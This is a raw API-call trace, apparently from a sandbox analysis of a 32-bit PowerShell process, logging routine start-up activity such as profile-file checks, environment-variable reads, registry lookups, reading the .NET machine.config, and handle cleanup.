	[0232.727] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x29e7ac | out: lpFileInformation=0x29e7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0232.727] GetLastError () returned 0x2
	[0232.727] SetErrorMode (uMode=0x1) returned 0x1
	[0232.727] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x29e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0232.727] GetLastError () returned 0x2
	[0232.727] SetErrorMode (uMode=0x1) returned 0x1
	[0232.727] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x29e7ac | out: lpFileInformation=0x29e7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0232.727] GetLastError () returned 0x3
	[0232.727] SetErrorMode (uMode=0x1) returned 0x1
	[0232.727] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x29e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0232.728] GetLastError () returned 0x3
	[0232.728] SetErrorMode (uMode=0x1) returned 0x1
	[0232.728] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x29e7ac | out: lpFileInformation=0x29e7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0232.728] GetLastError () returned 0x3
	[0232.728] SetErrorMode (uMode=0x1) returned 0x1
	[0232.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.729] GetLastError () returned 0xcb
	[0232.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.732] GetLastError () returned 0xcb
	[0232.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.735] GetLastError () returned 0xcb
	[0232.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.737] GetLastError () returned 0xcb
	[0232.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.738] GetLastError () returned 0xcb
	[0232.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.912] GetLastError () returned 0xcb
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d8
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0232.913] GetLastError () returned 0x0
	[0232.913] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0232.913] GetLastError () returned 0x0
	[0232.914] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354
	[0232.914] GetLastError () returned 0x0
	[0232.914] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360
	[0232.914] GetLastError () returned 0x0
	[0232.914] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0232.914] GetLastError () returned 0x0
	[0232.914] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0232.914] GetLastError () returned 0x0
	[0232.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.916] GetLastError () returned 0xcb
	[0232.921] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0232.921] GetLastError () returned 0xcb
	[0232.922] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x29e7ec | out: lpMode=0x29e7ec) returned 1
	[0232.923] GetLastError () returned 0xcb
	[0232.923] SetEvent (hEvent=0x3c4) returned 1
	[0232.924] GetLastError () returned 0xcb
	[0232.924] SetEvent (hEvent=0x39c) returned 1
	[0232.924] GetLastError () returned 0xcb
	[0232.924] SetEvent (hEvent=0x3d8) returned 1
	[0232.924] GetLastError () returned 0xcb
	[0232.924] SetEvent (hEvent=0x3c0) returned 1
	[0232.924] GetLastError () returned 0xcb
	[0232.924] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0232.924] GetLastError () returned 0x0
	[0232.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.926] GetLastError () returned 0xcb
	[0232.927] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e650 | out: phkResult=0x29e650*=0x370) returned 0x0
	[0232.927] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x29e698, lpData=0x0, lpcbData=0x29e694*=0x0 | out: lpType=0x29e698*=0x0, lpData=0x0, lpcbData=0x29e694*=0x0) returned 0x2

Thread:
	id = 236
	os_tid = 0xb80


Thread:
	id = 239
	os_tid = 0x7dc


Thread:
	id = 243
	os_tid = 0xb68


Thread:
	id = 245
	os_tid = 0xbe4


Thread:
	id = 248
	os_tid = 0xb18

	[0198.533] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0224.922] LocalFree (hMem=0x788e18) returned 0x0
	[0224.922] GetLastError () returned 0x0
	[0224.922] CloseHandle (hObject=0x354) returned 1
	[0224.923] GetLastError () returned 0x0
	[0224.923] CloseHandle (hObject=0x13) returned 1
	[0224.923] GetLastError () returned 0x0
	[0224.923] CloseHandle (hObject=0xf) returned 1
	[0224.924] GetLastError () returned 0x0
	[0224.924] RegCloseKey (hKey=0x334) returned 0x0
	[0224.924] RegCloseKey (hKey=0x330) returned 0x0
	[0224.924] RegCloseKey (hKey=0x32c) returned 0x0
	[0224.924] LocalFree (hMem=0x788e38) returned 0x0
	[0224.925] GetLastError () returned 0x0
	[0224.925] RegCloseKey (hKey=0x358) returned 0x0
	[0225.983] RegCloseKey (hKey=0x358) returned 0x0
	[0230.006] RegCloseKey (hKey=0x3a8) returned 0x0
	[0230.007] RegCloseKey (hKey=0x3a4) returned 0x0
	[0230.007] RegCloseKey (hKey=0x3a0) returned 0x0
	[0230.007] RegCloseKey (hKey=0x330) returned 0x0
	[0230.007] RegCloseKey (hKey=0x3d4) returned 0x0
	[0230.008] RegCloseKey (hKey=0x3d0) returned 0x0
	[0230.008] RegCloseKey (hKey=0x398) returned 0x0
	[0230.008] RegCloseKey (hKey=0x394) returned 0x0
	[0230.008] RegCloseKey (hKey=0x390) returned 0x0
	[0230.009] RegCloseKey (hKey=0x38c) returned 0x0
	[0230.009] RegCloseKey (hKey=0x388) returned 0x0
	[0230.009] RegCloseKey (hKey=0x384) returned 0x0
	[0230.009] RegCloseKey (hKey=0x380) returned 0x0
	[0230.009] RegCloseKey (hKey=0x37c) returned 0x0
	[0230.010] RegCloseKey (hKey=0x3cc) returned 0x0
	[0230.010] RegCloseKey (hKey=0x374) returned 0x0
	[0230.010] RegCloseKey (hKey=0x370) returned 0x0
	[0230.011] RegCloseKey (hKey=0x36c) returned 0x0
	[0230.011] RegCloseKey (hKey=0x368) returned 0x0
	[0230.011] RegCloseKey (hKey=0x364) returned 0x0
	[0230.012] RegCloseKey (hKey=0x360) returned 0x0
	[0230.012] RegCloseKey (hKey=0x354) returned 0x0
	[0230.012] RegCloseKey (hKey=0x334) returned 0x0
	[0230.012] RegCloseKey (hKey=0x3c8) returned 0x0
	[0230.013] RegCloseKey (hKey=0x32c) returned 0x0
	[0230.013] RegCloseKey (hKey=0x358) returned 0x0
	[0230.013] RegCloseKey (hKey=0x3c4) returned 0x0
	[0230.013] RegCloseKey (hKey=0x3c0) returned 0x0
	[0230.014] RegCloseKey (hKey=0x39c) returned 0x0
	[0230.014] RegCloseKey (hKey=0x3d8) returned 0x0
	[0230.014] RegCloseKey (hKey=0x3b8) returned 0x0
	[0230.015] RegCloseKey (hKey=0x3b4) returned 0x0
	[0230.015] RegCloseKey (hKey=0x3b0) returned 0x0
	[0230.015] RegCloseKey (hKey=0x3ac) returned 0x0
	[0233.543] RegCloseKey (hKey=0x370) returned 0x0
	[0238.110] CloseHandle (hObject=0x3d4) returned 1
	[0238.110] GetLastError () returned 0x0
	[0238.110] CloseHandle (hObject=0x3d0) returned 1
	[0238.110] GetLastError () returned 0x0
	[0238.110] CloseHandle (hObject=0x398) returned 1
	[0238.111] GetLastError () returned 0x0
	[0238.111] CloseHandle (hObject=0x394) returned 1
	[0238.111] GetLastError () returned 0x0
	[0238.111] CloseHandle (hObject=0x390) returned 1
	[0238.111] GetLastError () returned 0x0
	[0238.112] CloseHandle (hObject=0x388) returned 1
	[0238.112] GetLastError () returned 0x0
	[0238.112] CloseHandle (hObject=0x3e8) returned 1
	[0238.112] GetLastError () returned 0x0
	[0238.112] CloseHandle (hObject=0x38c) returned 1
	[0238.112] GetLastError () returned 0x0
	[0238.113] CloseHandle (hObject=0x370) returned 1
	[0238.113] GetLastError () returned 0x0
	[0238.113] CloseHandle (hObject=0x3e4) returned 1
	[0238.113] GetLastError () returned 0x0
	[0258.407] CoGetContextToken (in: pToken=0x4baf3b8 | out: pToken=0x4baf3b8) returned 0x0
	[0258.407] CoGetContextToken (in: pToken=0x4baf348 | out: pToken=0x4baf348) returned 0x0
	[0258.408] WbemLocator:IUnknown:Release (This=0x6350bf0) returned 0x0
	[0258.408] CoGetContextToken (in: pToken=0x4baf348 | out: pToken=0x4baf348) returned 0x0
	[0258.408] IUnknown:Release (This=0x635d4a0) returned 0x1
	[0258.408] CoGetContextToken (in: pToken=0x4baf314 | out: pToken=0x4baf314) returned 0x0
	[0258.408] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x1
	[0258.408] IUnknown:Release (This=0x635cb34) returned 0x0

Thread:
	id = 313
	os_tid = 0xccc


Thread:
	id = 317
	os_tid = 0xcdc

	[0233.034] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0233.167] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0233.174] VirtualQuery (in: lpAddress=0x5dee1a0, lpBuffer=0x5def1a0, dwLength=0x1c | out: lpBuffer=0x5def1a0*(BaseAddress=0x5dee000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0233.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.182] GetLastError () returned 0xcb
	[0233.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.189] GetLastError () returned 0xcb
	[0233.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.191] GetLastError () returned 0xcb
	[0233.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.389] GetLastError () returned 0xcb
	[0233.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.394] GetLastError () returned 0xcb
	[0233.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.396] GetLastError () returned 0xcb
	[0233.529] VirtualQuery (in: lpAddress=0x5dee2bc, lpBuffer=0x5def2bc, dwLength=0x1c | out: lpBuffer=0x5def2bc*(BaseAddress=0x5dee000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0233.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.530] GetLastError () returned 0xcb
	[0233.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.546] GetLastError () returned 0xcb
	[0233.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.546] GetLastError () returned 0xcb
	[0233.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.605] GetLastError () returned 0xcb
	[0233.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0233.825] GetLastError () returned 0xcb
	[0234.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.082] GetLastError () returned 0xcb
	[0234.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.084] GetLastError () returned 0xcb
	[0234.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.085] GetLastError () returned 0xcb
	[0234.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.088] GetLastError () returned 0xcb
	[0234.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.089] GetLastError () returned 0xcb
	[0234.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.090] GetLastError () returned 0xcb
	[0234.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.093] GetLastError () returned 0xcb
	[0234.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e18, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.139] GetLastError () returned 0xcb
	[0234.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.295] GetLastError () returned 0xcb
	[0234.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0234.360] GetLastError () returned 0xcb
	[0235.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5dee0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.948] GetLastError () returned 0xcb
	[0235.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5dee090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.949] GetLastError () returned 0xcb
	[0235.951] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7da200, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0235.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5dee114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0235.951] GetLastError () returned 0x0
	[0236.086] GetCurrentProcess () returned 0xffffffff
	[0236.086] GetLastError () returned 0x3f0
	[0236.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee228 | out: TokenHandle=0x5dee228*=0x370) returned 1
	[0236.086] GetLastError () returned 0x3f0
	[0236.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5deddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0236.092] GetLastError () returned 0x0
	[0236.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5dee268 | out: lpFileInformation=0x5dee268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0236.099] GetLastError () returned 0x0
	[0236.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5dedd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0236.105] GetLastError () returned 0x0
	[0236.110] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5dee264 | out: lpFileInformation=0x5dee264*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0236.110] GetLastError () returned 0x0
	[0236.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5dedccc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0236.110] GetLastError () returned 0x0
	[0236.111] SetErrorMode (uMode=0x1) returned 0x1
	[0236.111] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x38c
	[0236.111] GetLastError () returned 0x0
	[0236.111] GetFileType (hFile=0x38c) returned 0x1
	[0236.111] SetErrorMode (uMode=0x1) returned 0x1
	[0236.111] GetFileType (hFile=0x38c) returned 0x1
	[0236.118] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x5dee238 | out: lpFileSizeHigh=0x5dee238*=0x0) returned 0x60ed
	[0236.118] GetLastError () returned 0x0
	[0236.118] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dee1f0, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dee1f0*=0x1000, lpOverlapped=0x0) returned 1
	[0236.119] GetLastError () returned 0x0
	[0236.202] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedea8, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedea8*=0x1000, lpOverlapped=0x0) returned 1
	[0236.202] GetLastError () returned 0x0
	[0236.204] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedea8, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedea8*=0x1000, lpOverlapped=0x0) returned 1
	[0236.204] GetLastError () returned 0x0
	[0236.204] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedea8, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedea8*=0x1000, lpOverlapped=0x0) returned 1
	[0236.204] GetLastError () returned 0x0
	[0236.204] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedea8, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedea8*=0x1000, lpOverlapped=0x0) returned 1
	[0236.204] GetLastError () returned 0x0
	[0236.220] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedfdc, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedfdc*=0x1000, lpOverlapped=0x0) returned 1
	[0236.220] GetLastError () returned 0x0
	[0236.220] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dede70, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dede70*=0xed, lpOverlapped=0x0) returned 1
	[0236.220] GetLastError () returned 0x0
	[0236.220] ReadFile (in: hFile=0x38c, lpBuffer=0x2c79138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5dedf28, lpOverlapped=0x0 | out: lpBuffer=0x2c79138*, lpNumberOfBytesRead=0x5dedf28*=0x0, lpOverlapped=0x0) returned 1
	[0236.220] GetLastError () returned 0x0
	[0236.222] CloseHandle (hObject=0x38c) returned 1
	[0236.222] GetLastError () returned 0x0
	[0236.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5dee0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0236.227] GetLastError () returned 0x0
	[0236.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5dee090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0236.227] GetLastError () returned 0x0
	[0236.227] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7da200, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0236.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5dee114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0236.227] GetLastError () returned 0x0
	[0236.228] GetCurrentProcess () returned 0xffffffff
	[0236.228] GetLastError () returned 0x3f0
	[0236.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee4b8 | out: TokenHandle=0x5dee4b8*=0x38c) returned 1
	[0236.228] GetLastError () returned 0x3f0
	[0236.230] GetCurrentProcess () returned 0xffffffff
	[0236.230] GetLastError () returned 0x3f0
	[0236.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee4b8 | out: TokenHandle=0x5dee4b8*=0x388) returned 1
	[0236.230] GetLastError () returned 0x3f0
	[0236.237] GetCurrentProcess () returned 0xffffffff
	[0236.237] GetLastError () returned 0x3f0
	[0236.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5dee228 | out: TokenHandle=0x5dee228*=0x390) returned 1
	[0236.237] GetLastError () returned 0x3f0
	[0236.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5dee268 | out: lpFileInformation=0x5dee268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0236.238] GetLastError () returned 0x2
	[0236.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5dedd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0236.238] GetLastError () returned 0x2
